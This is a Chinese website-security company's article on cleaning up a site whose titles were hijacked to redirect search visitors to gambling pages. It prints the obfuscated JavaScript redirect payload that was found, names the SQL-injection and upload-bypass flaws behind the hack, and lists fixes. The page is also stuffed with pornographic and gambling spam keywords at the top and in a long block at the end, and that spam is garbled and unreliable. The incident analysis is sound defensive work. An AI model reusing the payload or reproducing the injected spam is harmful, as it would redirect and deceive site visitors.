3d动漫精品啪啪一区二区免费,柠檬福利精品视频导航,亚洲成a人无码亚洲成www牛牛,99精品国产高清一区二区

聯(lián)
咨詢熱線:

185-9527-1032

聯(lián)系QQ:

2863379292

官方微信:

網(wǎng)站標題被篡改成北京賽車、PK10的解決處理辦法

建站經(jīng)驗

導讀:客戶網(wǎng)站于近日被跳轉到賭博網(wǎng)站,打開后直接跳轉到什么北京賽車,pK10等內容的網(wǎng)站上去,客戶網(wǎng)站本身做了百度的推廣,導致所有訪問用戶都跳轉到賭博網(wǎng)站上去,給客戶帶來很大的經(jīng)濟

發(fā)表日期:2019-06-08

文章編輯:興田科技

瀏覽次數(shù):10058

標簽:

客戶網(wǎng)站于近日被跳轉到賭博網(wǎng)站,打開后直接跳轉到什么北京賽車,pK10等內容的網(wǎng)站上去,客戶網(wǎng)站本身做了百度的推廣,導致所有訪問用戶都跳轉到賭博網(wǎng)站上去,給客戶帶來很大的經(jīng)濟損失,再一個官方網(wǎng)站的形象也受到了影響。我們SINE安全對客戶網(wǎng)站進行檢查發(fā)現(xiàn),客戶網(wǎng)站的標題TDK被反復篡改成(北京賽車pK10等內容)立刻對該客戶網(wǎng)站的安全,進行全面的源代碼安全審計以及網(wǎng)站漏洞檢測與網(wǎng)站漏洞修復,檢查了客戶的首頁標題TDK內容確實是被篡改,并添加了一些加密的惡意代碼,代碼如下:

type="text/java"eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p;}('m["9d1lian0"]["8460a"]('h314620 0k2ae70aq05gbfb3146207 341e7o0023p55888c129b3rc1di599f62cg37jh5314620j');',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))

上述網(wǎng)站代碼是ASCII編碼,只要轉換成Unicode編碼,就可以看到加密的真實內容。我們工程師對代碼進行解讀,發(fā)現(xiàn)該代碼寫的是根據(jù)搜索引擎作為判斷條件進行跳轉的代碼,通俗來講就是說,該代碼只針對搜索引擎,網(wǎng)站管理員直接輸入網(wǎng)址并不會發(fā)現(xiàn)網(wǎng)站跳轉到賭博內容網(wǎng)站上去,客戶的網(wǎng)站通過百度或搜狗搜索會直接跳轉到這個北京賽車、pk10的網(wǎng)站上去。

針對于上述的問題,我們立即刪除加密的跳轉代碼,先將客戶網(wǎng)站損失降到最低,促使網(wǎng)站正常訪問(因為客戶一直在做百度推廣,一直在燒錢),通過一系列的安全檢測,網(wǎng)站到底是因為那些漏洞被上傳木馬,并篡改網(wǎng)站首頁的呢?經(jīng)過我們Sine安全工程師對網(wǎng)站代碼的詳細的安全檢測后,發(fā)現(xiàn)該網(wǎng)站系統(tǒng)存在SQL注入漏洞,導致攻擊者可以獲取到管理員賬戶和密碼,而網(wǎng)站后臺的地址用的也是默認的admin目錄名,致使黑客獲取密碼后,直接登錄網(wǎng)站后臺,在對網(wǎng)站后臺安全檢測的時候,發(fā)現(xiàn)產品圖片上傳功能,存在繞過格式上傳腳本木馬的漏洞。

該網(wǎng)站漏洞產生于網(wǎng)站后臺的產品上傳頁面代碼中的$this->getext($filear["name"]); //取得擴展名$this->set_savename($file); //設置保存文件名,這個代碼對文件擴展名可以直接繞過并上傳php格式的腳本文件,從而讓攻擊者輕易取得網(wǎng)站的權限。客戶還反映說,網(wǎng)站經(jīng)常被反復的篡改,導致跳轉到賭博網(wǎng)站,找了網(wǎng)站建設的公司,他們也只是刪除掉代碼,沒過多久就又被篡改跳轉了,導致客戶網(wǎng)站損失嚴重,發(fā)生篡改跳轉的根本原因就是網(wǎng)站有漏洞,如果沒有修復好網(wǎng)站漏洞,即使刪除掉惡意代碼也只是表面上的工作,不起作用的還是會被反復篡改,于事無補,亡羊補牢一樣。需要對網(wǎng)站進行安全檢測,以及網(wǎng)站漏洞檢測,并修復好網(wǎng)站漏洞,清除木馬后門,網(wǎng)站安全部署好,才會使網(wǎng)站更加的安全穩(wěn)定運行。

網(wǎng)站漏洞修復的處理過程如下:

對客戶網(wǎng)站源代碼進行安全加固以及防止sql注入的前端過濾代碼,網(wǎng)站的后臺目錄安全設置,更改admin文件名為@#%admin,對網(wǎng)站后臺圖片上傳功能代碼進行漏洞修復,設置上傳文件白名單機制,以及文件上傳的目錄進行了腳本安全權限設置,禁止進行腳本,對上傳的文件擴展也進行了深入的安全過濾,網(wǎng)站的數(shù)據(jù)庫安全部署,對數(shù)據(jù)庫的連接信息進行加密,刪除root管理權限,設置普通數(shù)據(jù)庫賬號,讀寫分離,新建表,查詢表,寫入表等數(shù)據(jù)庫正常操作權限,網(wǎng)站后臺的賬號密碼設置的復雜一些,密碼為12位數(shù)字+字母+大小寫組合,從發(fā)現(xiàn)網(wǎng)站漏洞到目前解決問題中,共查找到腳本木馬3個(webshell),一句話小馬后門2個,發(fā)現(xiàn)網(wǎng)站的模板內容也被篡改了,導致客戶生成首頁的時候隨之也被加了惡意加密的代碼。

網(wǎng)站安全預防措施:

1.盡量避免網(wǎng)站后臺的默認名稱如admin manage houtai

2.對網(wǎng)站上傳目錄的權限進行控制。(設置無腳本執(zhí)行權限)

3.網(wǎng)站后臺的用戶名和密碼設置復雜點,數(shù)字+字母+大小寫+特殊符號組合。

4.阿里云虛擬主機用戶的FTp賬號密碼要設置復雜點,數(shù)字+字母+大小寫+特殊符號組合。

5.如果是單獨服務器的客戶,建議先把服務器的安全部署好,對每個網(wǎng)站的文件夾進行安全部署,數(shù)據(jù)庫安全部署,,再做網(wǎng)站的安全,否則你網(wǎng)站再安全,服務器不安全也是于事無補。如果對安全不是太懂的話,建議找專業(yè)的網(wǎng)站安全公司去處理解決。

本文來源:A5

相關推薦

更多新聞

韩国无码AV片在线观看网站| 亚洲人片在线观看天堂无码| 亚洲一区二区三区中文字幕在线| 亚洲成av人片在| 99久久人妻精品免费一区| 亚洲爆乳无码一区二区三区| 色噜噜狠狠色综合成人网| 国产极品美女高潮无套在线观看| 欧美精欧美乱码一二三四区| 2018高清国产一区二区三区| 国产一卡2卡3卡四卡精品网站免费国| 中文AV岛国无码免费播放| 中国农村妇女真实BBWBBWBBW| 国产网红女主播精品视频| 天天爽夜夜爽夜夜爽精品视频| 青青草97国产精品免费观看| 每日更新在线观看av| 久久嫩草精品久久久久精品| 亚洲美女又黄又爽在线观看| 肥臀熟女一区二区三区| 免费观看无遮挡WWW的视频| 女女互磨互喷水高潮les呻吟| 老子影院午夜精品无码| 台湾无码av一区二区三区| 人妻厨房出轨上司HD院线波| 精品国产亚洲一区二区三区| 国产无遮挡又黄又爽免费视频| 特级毛片A片全免费播放心| 国语对白做受xxxxx在线中国| 亚洲欧洲日产韩国无码| 玖玖资源站亚洲最大成人网站| 婷婷综合另类小说色区| 国内精品视频一区二区三区| 日本中文字幕乱码免费| 男人猛进出女人下面视频| 亚洲2022国产成人精品无码区| 99久久久无码国产精品9| 极品尤物被啪到呻吟喷水| 妖精色av无码国产在线看| 一个人看的免费视频www| 免费又大粗又爽又黄少妇毛片|